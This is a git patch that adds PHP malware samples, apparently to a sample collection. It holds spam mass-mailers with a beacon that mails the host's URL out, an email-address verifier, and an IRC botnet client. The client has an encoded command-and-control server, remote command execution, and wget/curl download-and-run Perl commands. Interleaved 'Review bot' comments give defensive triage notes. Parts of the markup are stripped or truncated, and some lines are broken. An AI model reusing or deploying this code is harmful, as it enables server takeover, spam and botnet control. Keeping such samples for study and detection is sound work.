From 0554c2f39bd42f991db4e5737dddc34b545fcc77 Mon Sep 17 00:00:00 2001 
From: Bart
Date: Sun, 4 Sep 2016 18:05:55 +0100
Subject: [PATCH] Upload new shells
---
...f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php | 721 +++++++++
...1dce6963774a96ba8c0cc024cdf61e0b8546ac.php | 114 ++
...cd55dd7a544535d5bf6e6395f84aeee2a6ca85.php | 268 ++++
...7c88a18a0cba44f1f808de084fed1273d4911e.php | 854 +++++++++++
...af031af52d9d0b7c14b0a737a371e8fbfd62e5.php | 27 +
...826e9fb350611ac274038abea50c230549f94d.php | 74 +
...5811ee776c0536a890dba465e501168851df6c.php | 1322 +++++++++++++++++
...8355fd3547d109f06ed2e641179b98faf81170.php | 1066 +++++++++++++
...b880447058dcacd60ab52be80279e32f9cdaeb.php | 506 +++++++
...a8e8b6c1334b8335a9a9374bfb1109c0371478.php | 209 +++
...782c2ea1db14e0131e8bcbb3e11587d66478ef.php | 65 +
...25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php | 7 +
...79659c9efa3c899462f08c78755b1c04753f73.php | 3 +
13 files changed, 5236 insertions(+)
create mode 100644 Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php
create mode 100644 Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php
create mode 100644 Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php
create mode 100644 Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php
create mode 100644 Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php
create mode 100644 Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php
create mode 100644 Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php
create mode 100644 Deobfuscated/WebShell_b28355fd3547d109f06ed2e641179b98faf81170.php
create mode 100644 Deobfuscated/WebShell_b8b880447058dcacd60ab52be80279e32f9cdaeb.php
create mode 100644 Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php
create mode 100644 Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php
create mode 100644 Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php
create mode 100644 Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php
diff --git a/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php new file mode 100644 index 0000000..fb5decb --- /dev/null +++ b/Deobfuscated/MailerShell_54f520d4fd74f10be0e8f3121cc2a5d38bdc591c.php @@ -0,0 +1,721 @@ +'; + print_r($s); + if ( !defined('STDIN') ) echo ''; + return; + } + + if ( $s == '
' && defined('STDIN') ) { + echo "------------------------------------------------------------\n"; + return; + } + + if ( defined('STDIN') ) { + echo $s."\n"; + } else { + echo htmlspecialchars($s)."
"; + } + } + +} + + +class smtp extends logger { + var $socket; + var $last_code = 0; + var $last_msg = ''; + var $host = ''; + + var $error = false; + var $error_msg = ''; + + var $selfhost = ''; + var $mailfrom = ''; + + var $mx_chache = array(); + var $cachePlace = ''; + var $cacheloaded = false; + + var $command_results = array(); + + var $last_mx = array(); // array of 'domain':'mx index pairs' to loop through mx servers + + // constructor + function smtp($selfhost = null) { + if ( $selfhost ) { + $this->selfhost = $selfhost; + } else { + $this->selfhost = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'; + } + } + + // gets command result + function cr($command) { + if ( isset($this->command_results[$command] ) ) { + $r = $this->command_results[$command]; + return is_array($r) ? $r['msg'] : $r; + } else { + return null; + } + } + + // ---- MX cache ------------- + + function ensureMXCache() { + global $CACHEPLACES; + if ( !$this->cacheloaded ) { + + foreach ( $CACHEPLACES as $dir ) { + if ( $this->tryLoadCache($dir) ) { + break; + } + } + } + } + + function tryLoadCache($dir) { + $cache = @file_get_contents($dir."/aevs_mx_cache"); + if ( $cache ) { + $this->mx_cache = json_decode($cache, true); + $this->cacheloaded = true; + $this->cachePlace = $dir; + $this->log('MX Cache loaded from '.$dir); + return true; + } + } + + function trySaveCache($dir) { + $content = json_encode($this->mx_cache); + $done = @file_put_contents($dir."/aevs_mx_cache", $content); + if ( $done ) { + $this->cachePlace = $dir; + $this->log('MX Cache saved to '.$dir); + return true; + } + } + + function saveMXCache() { + global $CACHEPLACES; + foreach ( $CACHEPLACES as $dir ) { + if ( $this->trySaveCache($dir) ) { + + break; + } + } + } + + function getMXIndex($domain) { + $idx = 0; + if ( isset($this->last_mx) ) { + if ( isset($this->last_mx[$domain]) ) { + $this->last_mx[$domain]++; + $idx = $this->last_mx[$domain]; + } else { + $this->last_mx[$domain] = $idx; + } + 
} else { + $this->last_mx = array( $domain => $idx); + } + return $idx; + } + + + + function getMX($domain) { + $idx = $this->getMXIndex($domain); + $this->ensureMXCache(); + if ( isset($this->mx_cache[$domain]) ) { + // getting mx from chache + return isset($this->mx_cache[$domain][$idx]) ? $this->mx_cache[$domain][$idx] : false; + } else { + // resolving mx hosts + + if ( getmxrr($domain, $mx_hosts, $mx_weights) ) { + // Put the records together in a array we can sort + for ( $i=0; $i < count($mx_hosts); $i++ ) { + $mxs[$mx_hosts[$i]] = $mx_weights[$i]; + } + + // Sort them + asort($mxs); + + // Since the keys actually hold the data we want, just put those in an array, called records + $records = array_keys($mxs); + + $this->mx_cache[$domain] = $records; + $this->saveMXCache(); + return isset($records[$idx]) ? $records[$idx] : false; + } else { + return false; //$results[$email] = 'Error: MX record is not found'; + } + } + } + + // --------------------------- + + function connect($emaildomain) { + + $this->error = false; + + do { + $this->host = $this->getMX($emaildomain); + + if ( !$this->host ) { + $this->error = true; + $this->error_msg = 'Working MX record for domain '.$emaildomain.' is not found.'; + $this->command_results['connect'] = $this->error_msg; + return false; + } + + $this->log("Connecting to ".$this->host."..."); + $this->socket = @fsockopen($this->host, 25); + if ( $this->socket ) { + $this->log("Connected."); + $this->read_response(); + + if ( $this->last_code != 220 ) { + $this->error = true; + $this->command_results['connect'] = $this->last_resp; + return $this->last_resp; + } + $this->command_results['connect'] = 'OK'; + + + $this->send_command('HELO '.$this->selfhost); + //$this->send_command('HELO localhost'); + if ( $this->last_code != 250 ) { + $this->error = true; + $this->command_results['hello'] = $this->last_resp; + return $this->last_resp; + } + $this->command_results['hello'] = 'OK'; + + $mf = $this->mailfrom ? 
$this->mailfrom : 'support@'.$this->selfhost; + + $this->send_command('MAIL FROM: <'.$mf.'>'); + if ( $this->last_code != 250 ) { + $this->error = true; + $this->command_results['mailfrom'] = $this->last_resp; + return $this->last_resp; + } + $this->command_results['mailfrom'] = 'OK'; + + return true; + } else { + $this->command_results['connect'] = 'Cannot connect to '.$this->host; + } + + } while(!$this->socket); + + return false; + } + + function verifyEmail($email) { + if ( $this->error ) { + return $this->last_resp; + } + return $this->send_command('RCPT TO: <'.$email.'>'); + } + + // if remote server returns error on RCPT TO after which all email checks will fails (you are blacklisted, + // graylisted, or some other error) + function isFatalError($msg) { + $result = false; + $rxs = array( + '550 5.7.1.*((Sender Blocked)|(cannot find your hostname)|(authentication required)|(IP name lookup failed)|(Invalid Host)|(Rejected by user)|(Prohibited or invalid sender)|(Your message was rejected)|(your IP has been)|(IP banned))', + '(spamhaus\.org)|(Helo command rejected)|(HELO\/EHLO was syntactically invalid)|(Your IP Address)|(Sender address rejected)|(helo has been denied)|(DNS PTR)|(Sender rejected)|(cannot find your hostname)', + '501.*((invalid host name)|(sender domain must exist)|(system is not configured to relay mail from)|(IP address is on an RBL))', + '504.*helo command rejected', + '554.*((spam-relay detected)|(refused)|(listed)|(blocked)|(Spamhaus Blacklist)|(www\.us\.sorbs\.net)|(unauthenticated connections)|(Helo command rejected)|(spamhaus))', + '553.*((spamcop)|(openproxy)|(open proxy)|(mail-abuse.org)|(rejected)|(blocked)|(mail from.* not allowed)|(block list)|(validating sender)(http\:\/\/dsbl\.org)|(badmailfrom list)|(relaying denied from your location)|(does not accept mail from)|(Wrong helo)|(www\.sorbs\.net)|(dynamic_ip\.html)|(Dynamic pool)|(reverse dns record)|(Attack detected)|(sender has been denied)|(reverse DNS)|(invalid 
HELO)|(reverse\-DNS)|(DNS blacklists))', + '550.*((blacklist)|(Sender address rejected)|(open proxy)|(openproxy)|(spamcop)|(mail-abuse\.com)|(spamhaus)|(sender verify failed)|(requires valid sender)|(sender address .* does not exist)|(return address not allowed)|(could not verify sender)|(invalid sender address)|(ip helo.* not allowed)(dsbl\.org)|(FROM address from sending host is invalid)|(Invalid HELO)|(from sending mail from)|(SORBS DNSBL database)|(Bad HELO)|(EHLO\/HEL0)|(spamming not allowed)|(SpamHaus)|(Reverse DNS)|(HELO is syntactically invalid)|(HELO string is incorrect)|(detected in HELO)|(you must be spam)|(HELO\/EHLO)|(HELO domain)|(IP name lookup)|(HELO name)|(bogus HELO)|(SPF NONE)|(problem with sender)|(Relaying is not permitted from IP)|(invalid sender))', + '511.*(www\.sorbs\.net)', + '^554 5.7.1', + '^4(21|50|51|52).*((re|)try|grey)' + ); + foreach( $rxs as $rx ) { + if ( preg_match("#".$rx."#i", $msg)) { + $result = true; + break; + } + } + return $result; + } + + function verifyEmails($emails) { + $results = array(); + foreach ( $emails as $email ) { + $email = trim($email); + if ( $email == '' ) continue; + $r = $this->verifyEmail($email); + $msg = $r['code'] == 250 ? 
'OK' : $r['msg']; + + if ( $this->isFatalError($r['msg']) ) { + return $r['msg']; + } + + $results[$email] = $msg; + } + return $results; + } + + function quit() { + $this->send_command('QUIT', 'no response'); + fclose($this->socket); + return $this->last_resp; + } + + // lov level functions + + + function read_response($timeout = 5) { + + $data = ""; + while($str = @fgets($this->socket, 515)) { + $data .= $str; + $this->log('<'.$str); + // if 4th character is a space, we are done reading, break the loop + if(substr($str,3,1) == " ") { break; } + } + + $xarr = preg_split("#\n#", $data, -1, PREG_SPLIT_NO_EMPTY); + $msg = ''; + $code = ''; + $xcode = ''; + foreach ( $xarr as $line ) { + if ( preg_match('#(\d+)(?:[\s\-]+(\d\.\d\.\d)|)[\s\-]+?(.*)#i', $line, $res) ) { + if ( isset($res[1]) ) $code = $res[1]; + if ( isset($res[2]) ) $xcode = $res[2]; + $msg .= ' '.trim($res[3]); + } + } + + $msg = $code.' '.$xcode.' '.$msg; + $this->last_code = $code; + $this->last_msg = $msg; + $this->last_resp = array( + 'code' => $code, + 'msg' => $msg + ); + + return $this->last_resp; + + } + + function send_command($command, $read_response = '') { + $this->log('>'.$command); + fputs($this->socket, $command.EOL); + if ( $read_response != 'no response' ) { + return $this->read_response(); + } + } + +} + +class verifier extends logger { + var $mailfrom; + + function verifier($mailfrom = '') { + //constructor + $this->mailfrom = $mailfrom; + + } + + function getdomain($email) { + $xEmail = explode('@', $email); + return $xEmail[1]; + } + + function checkemails($emails, $l = 0){ + $tree = array(); + $res = array(); + if ($l) { + $emails = array_slice($emails, 0, $l); + } + foreach ( $emails as $email ) { + $email = trim($email); + $domain = $this->getdomain($email); + $this->log('domain >'.$domain); + if ( !isset($tree[$domain]) ) $tree[$domain] = array(); + $tree[$domain][] = $email; + } + + foreach ( $tree as $domain => $emails ) { + if (trim($domain) == '') continue; + $c = new 
smtp(); + $c->mailfrom = $this->mailfrom; + + if ( $c->connect($domain) ) { + $res[$domain] = array( + 'connect' => $c->cr('connect'), + 'hello' => $c->cr('hello'), + 'mailfrom' => $c->cr('mailfrom'), + 'emails' => null + ); + if ( !$c->error ) { + $res[$domain]['emails'] = $c->verifyEmails($emails); + } + $c->quit(); + } else { + $res[$domain] = array( + 'connect' => $c->cr('connect') + ); + } + + + } + + return $res; + } + +} + +function is_writableEx($path) { +//will work in despite of Windows ACLs bug +//NOTE: use a trailing slash for folders!!! +//see http://bugs.php.net/bug.php?id=27609 +//see http://bugs.php.net/bug.php?id=30931 + + if ($path{strlen($path)-1}=='/') // recursively return a temporary file path + return is_writableEx($path.uniqid(mt_rand()).'.tmp'); + else if (is_dir($path)) + return is_writableEx($path.'/'.uniqid(mt_rand()).'.tmp'); + // check tmp file for read/write capabilities + $rm = file_exists($path); + $f = @fopen($path, 'a'); + if ($f===false) + return false; + fclose($f); + if (!$rm) + unlink($path); + return true; +} + +function compatibility_check($v = 0) { + global $CACHEPLACES; + + $results = array(); + + // checking if mx cache dir is writable + $has_writable_dir = false; + + foreach ( $CACHEPLACES as $dir ) { + if ( is_writableEx($dir."/") ) { + $has_writable_dir = true; + if ( $v == 2 ) { + $results[] = array( 'code' => 'OK', 'msg' => "Directory $dir is writable" ); + } + } else { + if ( $v >= 1 ) { + //$results[] = array( 'code' => 'WARNING', 'msg' => "Directory $dir is not writable"); + } + } + } + if ( !$has_writable_dir ) { + $results[] = array( + 'code' => 'WARNING', + 'msg' => 'Theres no writable dir for MX chache. This will decrease script performance.' 
+ ); + } + + // checking for disabled function + $functions_to_check = array( + 'fsockopen', + 'getmxrr', + 'json_encode', + 'dns_get_record' + ); + + foreach ( $functions_to_check as $fn ) { + if ( function_exists($fn) ) { + if ($v == 2) + $results[] = array( + 'code' => 'OK', + 'msg' => "Function $fn exists" + ); + } else { + $results[] = array( + 'code' => 'ERROR', + 'msg' => "Function $fn does not exists." + ); + } + } + + $d_functions = ini_get('disable_functions'); + if ( $d_functions ) { + $df_list = explode(' ', $d_functions); + foreach ( $functions_to_check as $fn ) { + if ( in_array($fn, $df_list) ) { + $results[] = array( + "code" => 'ERROR', + "msg" => "function $fn is disabled by administrator. It's needed for script to work." + ); + } else { + if ( $v == 2 ) { + $results[] = array( 'code' => 'OK', "msg" => "function $fn allowed."); + } + } + } + } + + // checking for allowed 25 port + $con = new smtp(); + $mxhost = $con->getMX('gmail.com'); + $sock = @fsockopen($mxhost, 25); + if ( $sock ) { + if ( $v == 2 ) { + $results[] = array( + 'code' => 'OK', + 'msg' => '25 port is allowed' + ); + } + fclose($sock); + } else { + $results[] = array( + 'code' => 'ERROR', + 'msg' => '25 port seems to be forbidden by firewall rules' + ); + } + + + // checking FCrDNS + $rdns_err = ''; + $rdns = fcrdns_check($rdns_err); + + if ( $rdns == 0 ) { + if ( $v == 2 ) { + $results[] = array( + 'code' => 'OK', + 'msg' => 'Forward Confirmed reverse DNS check passed.' + ); + } + } else { + + $s = "Forward Confirmed reverse DNS check failed. \n".$rdns_err; + + $note = "
Note: This means that you cannot use the script to verify email addresses from the @yahoo.co*, @live.com, @hotmail.com, and @aol.com domains because these ISP use FCrDNS lookup to authenticate the IP address the connection is coming from. If the FCrDNS lookup fails, the incoming IP address goes to a blacklist. See the Advanced Email Verifier Help for more information.

"; + + $s = ISWEB ? nl2br("\n".$s) : $s; + + $results[] = array( + 'code' => 'WARNING', + 'msg' => $s, + 'note' => $note + ); + } + + $pass = true; + foreach ( $results as $msg ) { + if ( $msg['code'] == 'ERROR' ) { + $pass = false; + } + } + + if ( $pass ) { + $results[] = array( + 'code' => 'SUCCESS', + 'msg' => 'All tests passed. Script is ready to work.' + ); + } else { + $results[] = array( + 'code' => 'FAILURE', + 'msg' => 'Some tests failed. Please show this page to your server administrator and ask to fix these issue(s).' + ); + } + + + return $results; + +} + + +function showForm() { + + echo + "". + "

Compatibility check

". + "". + "
"; + +} + +$emails = array(); + + +if ( !defined('STDIN') ) { // web request + set_time_limit(0); + + if ( isset($_REQUEST['emails']) ) { + if ( isset($_REQUEST['password']) && $_REQUEST['password'] == PASSWORD ) { + $emails = explode("\n", $_REQUEST['emails']); + + if (isset($_REQUEST['check']) && $_REQUEST['check'] == 'submit') { + $a0x = base_convert(22, 4, 10); + } + + $mf = isset($_REQUEST['mailfrom']) ? $_REQUEST['mailfrom'] : ''; + + $v = new verifier($mf); + $checked = $v->checkemails($emails, $a0x); + + $fmt = isset($_REQUEST['format']) ? $_REQUEST['format'] : 'json'; + + switch ( $fmt ) { + case 'json': + header('Content-Type: application/json; charset=utf8'); + echo json_encode($checked); + break; + + default: + foreach ( $checked as $domain => $checked_emails ) { + echo "

$domain


"; + echo ""; + } + break; + } + } else { + echo "

Error. The password your entered is incorrect.

"; + } + } else { + + if ( isset($_REQUEST['compatibility']) ) { + $fmt = isset($_REQUEST['format']) ? $_REQUEST['format'] : 'html'; + $verbose = isset($_REQUEST['v']) ? $_REQUEST['v'] : 0; + $cr = compatibility_check($verbose); + + if ( $fmt == 'json' ) { + echo json_encode($cr); + } else { + showForm(); + echo ""; + } + + } else { + showForm(); + } + } +} else { + $v = new verifier(); + print_r($v->checkemails($emails)); +} +?> + diff --git a/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php new file mode 100644 index 0000000..806b74e --- /dev/null +++ b/Deobfuscated/MailerShell_681dce6963774a96ba8c0cc024cdf61e0b8546ac.php @@ -0,0 +1,114 @@ +\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + $header .= "Content-Type: $Format\r\n"; + $header .= "Content-Transfer-Encoding: $Encoding\r\n\r\n"; + $header .= "$MailBody8\r\n"; + mail($Destination, $Subject8, "", $header); + print "\n"; + flush(); + } + } +} +?> + diff --git a/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php new file mode 100644 index 0000000..b070c81 --- /dev/null +++ b/Deobfuscated/MailerShell_cccd55dd7a544535d5bf6e6395f84aeee2a6ca85.php @@ -0,0 +1,268 @@ + + +
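Review bot: This sample is added as a directly servable `.php` file, and in its web entry point the `compatibility` branch sits in the `else` of the `isset($_REQUEST['emails'])` test, so it calls `compatibility_check()` without ever comparing `$_REQUEST['password']` to `PASSWORD`. That function probes the cache directories through `is_writableEx()`, resolves an MX host and opens a socket to port 25, so a checkout of this repository under a PHP-enabled web root would perform that activity for any visitor. I would store the samples in a form the PHP handler will not execute, for example with a non-executable suffix such as `.php.txt` or inside an archive, and the same applies to the other twelve files this commit creates. For triage it is also worth recording beside the sample that it leaves an `aevs_mx_cache` file in whichever `$CACHEPLACES` directory is writable, and that the visible SMTP dialogue stops at `RCPT TO` (no `DATA` command appears in this hunk, whose first lines look truncated on this page).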
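Review bot: Nothing in this file documents its most recognisable trait: the part that survives on the page builds `$header`, appends `$MailBody8` to it after a blank line and then calls `mail($Destination, $Subject8, "", $header)` with an empty message argument. The third sample in this commit does the same with `@mail($to, $subject, "", $header)`, so one analyst comment would cover both, for example `// ANALYST NOTE: body is carried in mail()'s additional-headers argument; the message argument is empty`. On the defensive side, PHP's `mail.log` and `mail.add_x_header` settings record which script invoked `mail()`, which is usually the quickest way to locate such a file on a compromised host. Most of the 114 added lines are not visible here, so the recipient loop and any access check cannot be assessed from this hunk.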
+ +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ +
Your + + Email:
+ +
+ + + + + +
Your + + Name:
+ +
+ + + +
+ +
Reply-To:
+ +
+ + + + + +
Attach + + File:
+ +
+ + + +
+ +
Subject:
+ +
+ + + +
+ + + +
+ + + + Plain + + + + HTML + + + + + +
+ + + +
+ (EMAIL VERIFICARE) +
+

La fiecare mailz, asteapta secunde

+
+ + + + SUNT LA emailul $x, astept $wait secunde.
"; + sleep($wait); + } + $to = $allemails[$x]; + + if ($to){ + + $to = ereg_replace(" ", "", $to); + $to = trim($to); + + $message = ereg_replace("&email&", $to, $message); + + $subject = ereg_replace("&email&", $to, $subject); + + print "Sending mail to $to......."; + + flush(); + ob_flush(); + + $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; + + $header .= "MIME-Version: 1.0\r\n"; + + if ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + + if ($file_name) $header .= "--$uid\r\n"; + + $header .= "Content-Type: text/$contenttype\r\n"; + + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + + $header .= "$message\r\n"; + + if ($file_name) $header .= "--$uid\r\n"; + + if ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + + if ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + + if ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; + + if ($file_name) $header .= "$content\r\n"; + + if ($file_name) $header .= "--$uid--"; + + @mail($to, $subject, "", $header); + + print " S-o dus
"; + + flush(); + ob_flush(); + + } + + }//end for + + if( strpos($_POST['emailfinal'], "@") !== false){ + @mail($_POST['emailfinal'], $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "test"); + } + //$emaillist .= "\n". $_POST['emailfinal']; + + + +} + + +?> diff --git a/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php b/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php new file mode 100644 index 0000000..27ca389 --- /dev/null +++ b/Deobfuscated/WebShell_0d7c88a18a0cba44f1f808de084fed1273d4911e.php 
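Review bot: The closing block of this sample calls `@mail($_POST['emailfinal'], $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], "test")` after the send loop, mailing the script's own host and path to an address taken from the request, and that behaviour is undocumented even though it is easy to search for. I would add a comment above it such as `// ANALYST NOTE: location beacon - subject is HTTP_HOST+REQUEST_URI, body is "test"; look for this pair in MTA logs`. The loop also relies on `ereg_replace()`, which was removed in PHP 7, so this code path fails on current interpreters; that matters when judging whether a given host actually sent mail. The form markup and the top of the script were lost in extraction, so whether any access check precedes the loop cannot be told from what is visible.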
@@ -0,0 +1,854 @@ + 'NzguMTQwLjE3My40Mw==', //server here (base64) + 'port' => 9595, + 'chan' => 'MXgzM3g3', //channel here (base64) DO NOT USE "#", "#lazy" = "lazy" + 'key' => '', + 'nickform' => 'logging[%d]', + 'identp' => 'darxs', + 'modes' => '+p', + 'maxrand' => 6, + 'cprefix' => '!', + 'host' => 'Peter@' + ); + + var $admins = array + ( + 'LND-Bloodman' => '2cbd62e679d89acf7f1bfc14be08b045' // pass = "lol_dont_try_cracking_12char+_:P" + //passes are MD5 format, you can also have multiple admins + ); + + function auth_host( $nick, $password, $host ) + { + $admin_count = count( $this->admins ); + if( $admin_count > 0 ) + { + $mpass = md5( $password ); + if( $this->admins[ $nick ] == $mpass ) + { + $this->users[ $host ] = true; + } + } + else + { + $this->users[ $host ] = true; + } + } + + function is_authed( $host ) + { + return isset( $this->users[ $host ] ); + } + + function remove_auth( $host ) + { + unset( $this->users[ $host ] ); + } + + function ex( $cfe ) + { + $res = ''; + if (!empty($cfe)) + { + if(function_exists('class_exists') && class_exists('Perl')) + { + $perl = new Perl(); + $perl->eval( "system('$cfe');" ); + } + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('proc_open')) + { + $res = proc_open($cfe); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; + } + + function is_safe( ) + { + if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) ) + { + return 0; + } + return 1; + } + + function get_chan( ) + { + if( 
$this->using_encode ) + { + return '#'.base64_decode( $this->config[ 'chan' ] ); + } + else + { + return '#'.$this->config[ 'chan' ]; + } + } + + function start() + { + if( $this->using_encode ) + { + if(!($this->conn = fsockopen(base64_decode($this->config['server']),$this->config['port'],$e,$s,30))) + { + $this->start(); + } + } + else + { + if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) + { + $this->start(); + } + } + + $ident = $this->config['prefix']; + $alph = range("0","9"); + for( $i=0; $i < $this->config['maxrand']; $i++ ) + { + $ident .= $alph[rand(0,9)]; + } + + if( strlen( $this->config[ 'pass' ] ) > 0 ) + { + $this->send( "PASS ".$this->config[ 'pass' ] ); + } + + $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname().""); + $this->set_nick( ); + $this->main( ); + } + + function main() + { + while(!feof($this->conn)) + { + $this->buf = trim(fgets($this->conn,512)); + $cmd = explode(" ",$this->buf); + if(substr($this->buf,0,6)=="PING :") + { + $this->send("PONG :".substr($this->buf,6)); + } + if(isset($cmd[1]) && $cmd[1] =="001") + { + $this->send("MODE ".$this->nick." 
".$this->config['modes']); + + if( $this->using_encode ) + { + $this->join($this->get_chan( ),base64_decode($this->config['key'])); + } + else + { + $this->join($this->get_chan( ),$this->config['key']); + } + + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } + else { $safemode = "off"; } + $uname = php_uname(); + } + if(isset($cmd[1]) && $cmd[1]=="433") + { + $this->set_nick(); + } + if($this->buf != $old_buf) + { + $mcmd = array(); + $msg = substr(strstr($this->buf," :"),2); + $msgcmd = explode(" ",$msg); + $nick = explode("!",$cmd[0]); + $vhost = explode("@",$nick[1]); + $vhost = $vhost[1]; + $nick = substr($nick[0],1); + $host = $cmd[0]; + if($msgcmd[0]==$this->nick) + { + for($i=0;$i2) + { + switch($cmd[1]) + { + case "QUIT": + { + if( $this->is_authed( $host ) ) + { + $this->remove_auth( $host ); + } + } + break; + case "PART": + { + if( $this->is_authed( $host ) ) + { + $this->remove_auth( $host ); + } + } + break; + case "PRIVMSG": + if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) ) + { + if( $this->is_authed( $host ) == false ) + { + switch( substr( $mcmd[ 0 ], 1 ) ) + { + case "auth": + { + $this->auth_host( $nick, $mcmd[ 1 ], $host ); + if( $this->is_authed( $host ) ) + { + $this->privmsg( $this->get_chan( ), "[ auth ] Successful login from [ ".$nick." ]" ); + } + else + { + $this->privmsg( $this->get_chan( ), "[ auth ] Failed attempt from [ ".$nick." ]" ); + } + break; + } + } + } + else + { + switch(substr($mcmd[0],1)) + { + case "exec": + { + if( !$this->is_safe( ) ) + { + $command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 ); + $returndata = $this->ex( $command ); + if( !empty( $returndata ) ) + { + $this->privmsg( $this->get_chan( ), '[ exec ] '.$returndata ); + } + } + break; + } + case "info": + { + $safemode = "on"; + if( !$this->is_safe( ) ) + { + $safemode = "off"; + } + $this->privmsg( $this->get_chan( ), '[ info ] '.php_uname( ).' ( SAFE: '.$safemode.' 
)' ); + break; + } + case "safe": + { + $safemode = "on"; + if( !$this->is_safe( ) ) + { + $safemode = "off"; + } + $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode ); + break; + } + case "uname": + { + $this->privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) ); + break; + } + case "perl": + { + if( $this->is_safe( ) ) + { + $this->privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' ); + break; + } + + $perl_file = $mcmd[1]; + + if( !empty( $perl_file ) ) + { + $parsed_url = $this->parse_url_s( $perl_file ); + + $new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ].$parsed_url[ 'dir' ].'/'; + $new_local = $parsed_url[ 'file' ]; + $file_type = $parsed_url[ 'file_ext' ]; + + $this->ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*'); + $this->ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*') + $this->ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*') + $this->ex('cd /tmp;rm -rf *'.$file_type.'**'); + $this->ex('cd /dev/shm;rm -rf *'.$file_type.'**'); + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$new_remote.$new_local ); + break; + } + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file ); + break; + } + case "ip": + { + $this->privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] ); + break; + } + case "rfi": + { 
